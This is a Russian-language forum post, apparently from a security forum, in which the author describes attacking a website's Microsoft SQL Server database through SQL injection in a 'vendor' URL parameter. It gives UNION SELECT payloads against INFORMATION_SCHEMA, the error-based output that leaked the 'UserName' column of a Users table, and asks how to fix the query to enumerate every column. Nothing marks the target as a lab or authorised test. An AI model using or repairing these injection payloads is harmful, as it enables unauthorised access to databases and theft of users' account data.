Всем доброго времени суток.
В общем с помощью SQL инъекции на сайте узнал все имена таблиц. Далее запросом :
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users'
Получил
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UserName' to a column of data type int.
Т.е. Первый столбец называется 'UserName'.
Далее делаю такой запрос:
&vendor=19 UNION SELECT COLUMN_NAME,null FROM INFORMATION_SCHEMA.COLUMNS WHERE%20TABLE_NAME='Users' WHERE%20COLUMN_NAME NOT IN (UserName)
На это сервер выдает:
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'WHERE'.
Из-за этого неудается получить названия остальных столбцов. По этому у меня вопрос как правильно сформировать запрос, чтобы сервер выдал названия всех столбцов.
подробно о проекте
Анализ криптографических сетевых...
новое сообщение
закрытая нитка
новое сообщение
в закрытой нитке
старое сообщение
